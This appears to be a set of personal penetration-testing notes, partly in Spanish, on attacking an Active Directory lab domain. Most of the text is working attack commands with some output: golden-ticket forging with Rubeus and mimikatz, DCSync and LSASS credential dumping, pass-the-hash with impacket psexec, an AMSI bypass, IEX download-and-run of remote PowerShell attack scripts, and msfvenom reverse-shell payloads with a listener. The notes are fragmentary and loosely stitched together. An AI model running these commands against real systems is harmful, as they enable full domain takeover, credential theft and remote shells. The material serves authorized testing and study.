Powershell [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>")) msf6 auxiliary(admin/kerberos/inspect_ticket) > run AES_KEY=4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326 TICKET_PATH=/path/to/ticket ####################################################################### ``` ![](https://hackmd.io/_uploads/SyiHfbO8h.png) -------------------------------------------------------------------- Differences between KRBTGT (Kerberos Ticket Granting Ticket) and TGT (Ticket Granting Ticket) KRBTGT (Kerberos Ticket Granting Ticket) • It is the KDC's service account• This is the Key Distribution Center, which is in charge of issuing all tickets to clients. • If you impersonate this account and obtain a golden ticket from the KRBTGT, you will be able to obtain any service ticket you desire. TGT (Ticket Granting Ticket) • It is a ticket to a service account issued by the KDC and, like the SQLService ticket.• It can only access the service from which the TGT is issued. export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME' ``` rubeus.exe asktgt /user:harshitrajpal /password:Password@1 rubeus.exe asktgt /user:harshitrajpal /rc4:64FBAE31CC352FC26AF97CBDEF151E03 rubeus.exe asktgs /user:harshitrajpal /ticket:doIFNDCCBTCgAwIBB...bA== /service:LDAP/dc1.ignite.local ``` # CLASE: ROAD TO GOLDEN TICKET .\Rubeus kerberoast lsadump::dcsync /domain:bleach.local /user:krbtgt ```bash .\R.exe asktgt /user:Administrador /domain:BLEACH.local /rc4:ADMIN-HASH ``` ```bash .\R.exe asktgs /user:Administrador /ticket:<ticket> /service:cifs/PRINCIPAL-BLEACH.BLEACH.local klist dir \\PRINCIPAL-BLEACH.BLEACH.local\c$ ``` ### DCSYNC ```bash .\R.exe asktgs /user:Administrador /ticket:<ticket> /service:LDAP/PRINCIPAL-BLEACH.BLEACH.local /ptt ``` ## REAL GOLDEN PS C:\Users\jquerito\Documents\mimikatz-master\mimikatz-master\x64> klist El id. de inicio de sesión actual es 0:0x732f7 Vales almacenados en caché: (1) #0> Cliente: hacker @ BLEACH.LOCAL Servidor: krbtgt/BLEACH.local @ BLEACH.LOCAL Tipo de cifrado de vale Kerberos: AES-256-CTS-HMAC-SHA1-96 Marcas de vale 0x40e00000 -> forwardable renewable initial pre_authent Hora de inicio: 5/27/2024 23:35:20 (local) Hora de finalización: 5/28/2024 9:35:20 (local) Hora de renovación: 6/3/2024 23:35:20 (local) Tipo de clave de sesión: AES-256-CTS-HMAC-SHA1-96 Marcas de caché: 0x1 -> PRIMARY KDC llamado: PS C:\Users\jquerito\Documents\mimikatz-master\mimikatz-master\x64> C:\Users\jquerito\Documents\R\R\R.exe golden /aes256:636bb5cf3b96c4faf704793c467c6af5836e85ff0bd669d406234e155d802af5 /ldap /user:hacker /ptt # POC THE TICKET https://www.kitploit.com/2023/04/cmloot-find-interesting-files-stored-on.html ``` .\R.exe asktgt /user:Administrador /domain:BLEACH.local /rc4:fc19a68b44372b3bcf0297e08a28fda8 .\R.exe asktgs /user:Administrador /ticket:<b64-ticket> /service:cifs/PRINCIPAL-BLEACH.BLEACH.local .\R.exe asktgs /user:Administrador /ticket:<b64-ticket> /service:LDAP/PRINCIPAL-BLEACH.BLEACH.local PS C:\Users\jquerito\Downloads> dir \\PRINCIPAL-BLEACH.BLEACH.local\c$ -> KRBTGT: 0a6d458c0c48da059c4992b37d77a3ac mimikatz # kerberos::golden /domain:BLEACH.local /sid: /rc4:8584cfccd24f6a7f49ee56355d41bd30 /user:newAdmin /id:500 /ptt kerberos::golden /domain:BLEACH.local /sid:S-1-5-21-3777977817-1859332824-490154379 /rc4:0a6d458c0c48da059c4992b37d77a3ac /user:Administrador /id:500 /groups:500,501,513,512,520,518,519 /ticket:gold.kirbi .\R.exe asktgs /user:Administrador /ticket:golden2.ticket /service:ldap/PRINCIPAL-BLEACH.BLEACH.local /ptt .\R.exe asktgs /user:Administrador /ticket:golden.ticket /service:cifs/PRINCIPAL-BLEACH.BLEACH.local /ptt .\R.exe asktgs /user:Administrador /ticket:gold2.kirbi /service:ldap/PRINCIPAL-BLEACH.BLEACH.local /ptt ``` # C MIMI "privilege::debug" "sekurlsa::logonpasswords" ![](https://hackmd.io/_uploads/ryqfymaUh.png) ### IMPACKET POC ``` ┌──(kali㉿kali)-[~/Documents] └─$ impacket-getTGT BLEACH.local/Administrador -dc-ip 10.0.9.4 -hashes :fc19a68b44372b3bcf0297e08a28fda8 Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation [*] Saving ticket in Administrador.ccache ┌──(kali㉿kali)-[~/Documents] └─$ export KRB5CCNAME=Administrador.ccache ┌──(kali㉿kali)-[~/Documents] └─$ impacket-psexec -k -no-pass @PRINCIPAL-BLEACH.BLEACH.local Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation ``` ![](https://hackmd.io/_uploads/SyCrFfpL2.png) diskshadow.exe /s ![](https://hackmd.io/_uploads/ByS-K1vO2.png) ![](https://hackmd.io/_uploads/SkqwckDdn.png) # AD PS C:\Windows\system32> $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Failed") {$f=$e}};$f.SetValue($null,$true) ___ gcc-mingw-w64 ___ PS C:\Windows\system32> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-PowerDump.ps1'); PS C:\Windows\system32> Invoke-PowerDump powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks” powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);” msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe __ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.45 LPORT=5558 -f exe > shell-x64.exe msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=192.168.137.130 LPORT=9500 > reverse_64bit.dll msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.1.42;set LPORT 5558;run;"